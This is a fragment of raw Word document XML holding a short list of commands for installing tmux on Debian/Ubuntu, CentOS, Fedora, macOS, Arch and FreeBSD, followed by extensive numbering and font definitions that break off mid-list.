        <w:t xml:space="preserve">For Debian/Ubuntu:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C90">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1409"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt update</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1409"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1409"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For CentOS/RHEL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1409"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo yum install tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1409"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Fedora:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1409"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo dnf install tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1409"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For macOS (if remote server is a Mac):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1409"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">brew install tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1409"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Arch Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1409"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo pacman -S tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1409"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For FreeBSD:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1409"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pkg install tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C9C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1409"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux -V</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1409"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify that you successfully installed</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId1392" w:type="default"/>
      <w:footerReference r:id="rId1393"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ungsuh"/>
  <w:font w:name="Arial Unicode MS"/>
  <w:font w:name="Calibri"/>
  <w:font w:name="Consola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Roboto Mon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C9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3CA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decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:b w:val="1"/>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decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>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9">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1">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5">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8">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decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="lef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3">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:color w:val="ff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0">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>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1">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5">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7">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>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7">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6">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8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8">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7">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1">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8">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0">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8">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2">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1">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>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7">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6">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>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8">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>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 w:numId="632">
    <w:abstractNumId w:val="632"/>
  </w:num>
  <w:num w:numId="633">
    <w:abstractNumId w:val="633"/>
  </w:num>
  <w:num w:numId="634">
    <w:abstractNumId w:val="634"/>
  </w:num>
  <w:num w:numId="635">
    <w:abstractNumId w:val="635"/>
  </w:num>
  <w:num w:numId="636">
    <w:abstractNumId w:val="636"/>
  </w:num>
  <w:num w:numId="637">
    <w:abstractNumId w:val="637"/>
  </w:num>
  <w:num w:numId="638">
    <w:abstractNumId w:val="638"/>
  </w:num>
  <w:num w:numId="639">
    <w:abstractNumId w:val="639"/>
  </w:num>
  <w:num w:numId="640">
    <w:abstractNumId w:val="640"/>
  </w:num>
  <w:num w:numId="641">
    <w:abstractNumId w:val="641"/>
  </w:num>
  <w:num w:numId="642">
    <w:abstractNumId w:val="642"/>
  </w:num>
  <w:num w:numId="643">
    <w:abstractNumId w:val="643"/>
  </w:num>
  <w:num w:numId="644">
    <w:abstractNumId w:val="644"/>
  </w:num>
  <w:num w:numId="645">
    <w:abstractNumId w:val="645"/>
  </w:num>
  <w:num w:numId="646">
    <w:abstractNumId w:val="646"/>
  </w:num>
  <w:num w:numId="647">
    <w:abstractNumId w:val="647"/>
  </w:num>
  <w:num w:numId="648">
    <w:abstractNumId w:val="648"/>
  </w:num>
  <w:num w:numId="649">
    <w:abstractNumId w:val="649"/>
  </w:num>
  <w:num w:numId="650">
    <w:abstractNumId w:val="650"/>
  </w:num>
  <w:num w:numId="651">
    <w:abstractNumId w:val="651"/>
  </w:num>
  <w:num w:numId="652">
    <w:abstractNumId w:val="652"/>
  </w:num>
  <w:num w:numId="653">
    <w:abstractNumId w:val="653"/>
  </w:num>
  <w:num w:numId="654">
    <w:abstractNumId w:val="654"/>
  </w:num>
  <w:num w:numId="655">
    <w:abstractNumId w:val="655"/>
  </w:num>
  <w:num w:numId="656">
    <w:abstractNumId w:val="656"/>
  </w:num>
  <w:num w:numId="657">
    <w:abstractNumId w:val="657"/>
  </w:num>
  <w:num w:numId="658">
    <w:abstractNumId w:val="658"/>
  </w:num>
  <w:num w:numId="659">
    <w:abstractNumId w:val="659"/>
  </w:num>
  <w:num w:numId="660">
    <w:abstractNumId w:val="660"/>
  </w:num>
  <w:num w:numId="661">
    <w:abstractNumId w:val="661"/>
  </w:num>
  <w:num w:numId="662">
    <w:abstractNumId w:val="662"/>
  </w:num>
  <w:num w:numId="663">
    <w:abstractNumId w:val="663"/>
  </w:num>
  <w:num w:numId="664">
    <w:abstractNumId w:val="664"/>
  </w:num>
  <w:num w:numId="665">
    <w:abstractNumId w:val="665"/>
  </w:num>
  <w:num w:numId="666">
    <w:abstractNumId w:val="666"/>
  </w:num>
  <w:num w:numId="667">
    <w:abstractNumId w:val="667"/>
  </w:num>
  <w:num w:numId="668">
    <w:abstractNumId w:val="668"/>
  </w:num>
  <w:num w:numId="669">
    <w:abstractNumId w:val="669"/>
  </w:num>
  <w:num w:numId="670">
    <w:abstractNumId w:val="670"/>
  </w:num>
  <w:num w:numId="671">
    <w:abstractNumId w:val="671"/>
  </w:num>
  <w:num w:numId="672">
    <w:abstractNumId w:val="672"/>
  </w:num>
  <w:num w:numId="673">
    <w:abstractNumId w:val="673"/>
  </w:num>
  <w:num w:numId="674">
    <w:abstractNumId w:val="674"/>
  </w:num>
  <w:num w:numId="675">
    <w:abstractNumId w:val="675"/>
  </w:num>
  <w:num w:numId="676">
    <w:abstractNumId w:val="676"/>
  </w:num>
  <w:num w:numId="677">
    <w:abstractNumId w:val="677"/>
  </w:num>
  <w:num w:numId="678">
    <w:abstractNumId w:val="678"/>
  </w:num>
  <w:num w:numId="679">
    <w:abstractNumId w:val="679"/>
  </w:num>
  <w:num w:numId="680">
    <w:abstractNumId w:val="680"/>
  </w:num>
  <w:num w:numId="681">
    <w:abstractNumId w:val="681"/>
  </w:num>
  <w:num w:numId="682">
    <w:abstractNumId w:val="682"/>
  </w:num>
  <w:num w:numId="683">
    <w:abstractNumId w:val="683"/>
  </w:num>
  <w:num w:numId="684">
    <w:abstractNumId w:val="684"/>
  </w:num>
  <w:num w:numId="685">
    <w:abstractNumId w:val="685"/>
  </w:num>
  <w:num w:numId="686">
    <w:abstractNumId w:val="686"/>
  </w:num>
  <w:num w:numId="687">
    <w:abstractNumId w:val="687"/>
  </w:num>
  <w:num w:numId="688">
    <w:abstractNumId w:val="688"/>
  </w:num>
  <w:num w:numId="689">
    <w:abstractNumId w:val="689"/>
  </w:num>
  <w:num w:numId="690">
    <w:abstractNumId w:val="690"/>
  </w:num>
  <w:num w:numId="691">
    <w:abstractNumId w:val="691"/>
  </w:num>
  <w:num w:numId="692">
    <w:abstractNumId w:val="692"/>
  </w:num>
  <w:num w:numId="693">
    <w:abstractNumId w:val="693"/>
  </w:num>
  <w:num w:numId="694">
    <w:abstractNumId w:val="694"/>
  </w:num>
  <w:num w:numId="695">
    <w:abstractNumId w:val="695"/>
  </w:num>
  <w:num w:numId="696">
    <w:abstractNumId w:val="696"/>
  </w:num>
  <w:num w:numId="697">
    <w:abstractNumId w:val="697"/>
  </w:num>
  <w:num w:numId="698">
    <w:abstractNumId w:val="698"/>
  </w:num>
  <w:num w:numId="699">
    <w:abstractNumId w:val="699"/>
  </w:num>
  <w:num w:numId="700">
    <w:abstractNumId w:val="700"/>
  </w:num>
  <w:num w:numId="701">
    <w:abstractNumId w:val="701"/>
  </w:num>
  <w:num w:numId="702">
    <w:abstractNumId w:val="702"/>
  </w:num>
  <w:num w:numId="703">
    <w:abstractNumId w:val="703"/>
  </w:num>
  <w:num w:numId="704">
    <w:abstractNumId w:val="704"/>
  </w:num>
  <w:num w:numId="705">
    <w:abstractNumId w:val="705"/>
  </w:num>
  <w:num w:numId="706">
    <w:abstractNumId w:val="706"/>
  </w:num>
  <w:num w:numId="707">
    <w:abstractNumId w:val="707"/>
  </w:num>
  <w:num w:numId="708">
    <w:abstractNumId w:val="708"/>
  </w:num>
  <w:num w:numId="709">
    <w:abstractNumId w:val="709"/>
  </w:num>
  <w:num w:numId="710">
    <w:abstractNumId w:val="710"/>
  </w:num>
  <w:num w:numId="711">
    <w:abstractNumId w:val="711"/>
  </w:num>
  <w:num w:numId="712">
    <w:abstractNumId w:val="712"/>
  </w:num>
  <w:num w:numId="713">
    <w:abstractNumId w:val="713"/>
  </w:num>
  <w:num w:numId="714">
    <w:abstractNumId w:val="714"/>
  </w:num>
  <w:num w:numId="715">
    <w:abstractNumId w:val="715"/>
  </w:num>
  <w:num w:numId="716">
    <w:abstractNumId w:val="716"/>
  </w:num>
  <w:num w:numId="717">
    <w:abstractNumId w:val="717"/>
  </w:num>
  <w:num w:numId="718">
    <w:abstractNumId w:val="718"/>
  </w:num>
  <w:num w:numId="719">
    <w:abstractNumId w:val="719"/>
  </w:num>
  <w:num w:numId="720">
    <w:abstractNumId w:val="720"/>
  </w:num>
  <w:num w:numId="721">
    <w:abstractNumId w:val="721"/>
  </w:num>
  <w:num w:numId="722">
    <w:abstractNumId w:val="722"/>
  </w:num>
  <w:num w:numId="723">
    <w:abstractNumId w:val="723"/>
  </w:num>
  <w:num w:numId="724">
    <w:abstractNumId w:val="724"/>
  </w:num>
  <w:num w:numId="725">
    <w:abstractNumId w:val="725"/>
  </w:num>
  <w:num w:numId="726">
    <w:abstractNumId w:val="726"/>
  </w:num>
  <w:num w:numId="727">
    <w:abstractNumId w:val="727"/>
  </w:num>
  <w:num w:numId="728">
    <w:abstractNumId w:val="728"/>
  </w:num>
  <w:num w:numId="729">
    <w:abstractNumId w:val="729"/>
  </w:num>
  <w:num w:numId="730">
    <w:abstractNumId w:val="730"/>
  </w:num>
  <w:num w:numId="731">
    <w:abstractNumId w:val="731"/>
  </w:num>
  <w:num w:numId="732">
    <w:abstractNumId w:val="732"/>
  </w:num>
  <w:num w:numId="733">
    <w:abstractNumId w:val="733"/>
  </w:num>
  <w:num w:numId="734">
    <w:abstractNumId w:val="734"/>
  </w:num>
  <w:num w:numId="735">
    <w:abstractNumId w:val="735"/>
  </w:num>
  <w:num w:numId="736">
    <w:abstractNumId w:val="736"/>
  </w:num>
  <w:num w:numId="737">
    <w:abstractNumId w:val="737"/>
  </w:num>
  <w:num w:numId="738">
    <w:abstractNumId w:val="738"/>
  </w:num>
  <w:num w:numId="739">
    <w:abstractNumId w:val="739"/>
  </w:num>
  <w:num w:numId="740">
    <w:abstractNumId w:val="740"/>
  </w:num>
  <w:num w:numId="741">
    <w:abstractNumId w:val="741"/>
  </w:num>
  <w:num w:numId="742">
    <w:abstractNumId w:val="742"/>
  </w:num>
  <w:num w:numId="743">
    <w:abstractNumId w:val="743"/>
  </w:num>
  <w:num w:numId="744">
    <w:abstractNumId w:val="744"/>
  </w:num>
  <w:num w:numId="745">
    <w:abstractNumId w:val="745"/>
  </w:num>
  <w:num w:numId="746">
    <w:abstractNumId w:val="746"/>
  </w:num>
  <w:num w:numId="747">
    <w:abstractNumId w:val="747"/>
  </w:num>
  <w:num w:numId="748">
    <w:abstractNumId w:val="748"/>
  </w:num>
  <w:num w:numId="749">
    <w:abstractNumId w:val="749"/>
  </w:num>
  <w:num w:numId="750">
    <w:abstractNumId w:val="750"/>
  </w:num>
  <w:num w:numId="751">
    <w:abstractNumId w:val="751"/>
  </w:num>
  <w:num w:numId="752">
    <w:abstractNumId w:val="752"/>
  </w:num>
  <w:num w:numId="753">
    <w:abstractNumId w:val="753"/>
  </w:num>
  <w:num w:numId="754">
    <w:abstractNumId w:val="754"/>
  </w:num>
  <w:num w:numId="755">
    <w:abstractNumId w:val="755"/>
  </w:num>
  <w:num w:numId="756">
    <w:abstractNumId w:val="756"/>
  </w:num>
  <w:num w:numId="757">
    <w:abstractNumId w:val="757"/>
  </w:num>
  <w:num w:numId="758">
    <w:abstractNumId w:val="758"/>
  </w:num>
  <w:num w:numId="759">
    <w:abstractNumId w:val="759"/>
  </w:num>
  <w:num w:numId="760">
    <w:abstractNumId w:val="760"/>
  </w:num>
  <w:num w:numId="761">
    <w:abstractNumId w:val="761"/>
  </w:num>
  <w:num w:numId="762">
    <w:abstractNumId w:val="762"/>
  </w:num>
  <w:num w:numId="763">
    <w:abstractNumId w:val="763"/>
  </w:num>
  <w:num w:numId="764">
    <w:abstractNumId w:val="764"/>
  </w:num>
  <w:num w:numId="765">
    <w:abstractNumId w:val="765"/>
  </w:num>
  <w:num w:numId="766">
    <w:abstractNumId w:val="766"/>
  </w:num>
  <w:num w:numId="767">
    <w:abstractNumId w:val="767"/>
  </w:num>
  <w:num w:numId="768">
    <w:abstractNumId w:val="768"/>
  </w:num>
  <w:num w:numId="769">
    <w:abstractNumId w:val="769"/>
  </w:num>
  <w:num w:numId="770">
    <w:abstractNumId w:val="770"/>
  </w:num>
  <w:num w:numId="771">
    <w:abstractNumId w:val="771"/>
  </w:num>
  <w:num w:numId="772">
    <w:abstractNumId w:val="772"/>
  </w:num>
  <w:num w:numId="773">
    <w:abstractNumId w:val="773"/>
  </w:num>
  <w:num w:numId="774">
    <w:abstractNumId w:val="774"/>
  </w:num>
  <w:num w:numId="775">
    <w:abstractNumId w:val="775"/>
  </w:num>
  <w:num w:numId="776">
    <w:abstractNumId w:val="776"/>
  </w:num>
  <w:num w:numId="777">
    <w:abstractNumId w:val="777"/>
  </w:num>
  <w:num w:numId="778">
    <w:abstractNumId w:val="778"/>
  </w:num>
  <w:num w:numId="779">
    <w:abstractNumId w:val="779"/>
  </w:num>
  <w:num w:numId="780">
    <w:abstractNumId w:val="780"/>
  </w:num>
  <w:num w:numId="781">
    <w:abstractNumId w:val="781"/>
  </w:num>
  <w:num w:numId="782">
    <w:abstractNumId w:val="782"/>
  </w:num>
  <w:num w:numId="783">
    <w:abstractNumId w:val="783"/>
  </w:num>
  <w:num w:numId="784">
    <w:abstractNumId w:val="784"/>
  </w:num>
  <w:num w:numId="785">
    <w:abstractNumId w:val="785"/>
  </w:num>
  <w:num w:numId="786">
    <w:abstractNumId w:val="786"/>
  </w:num>
  <w:num w:numId="787">
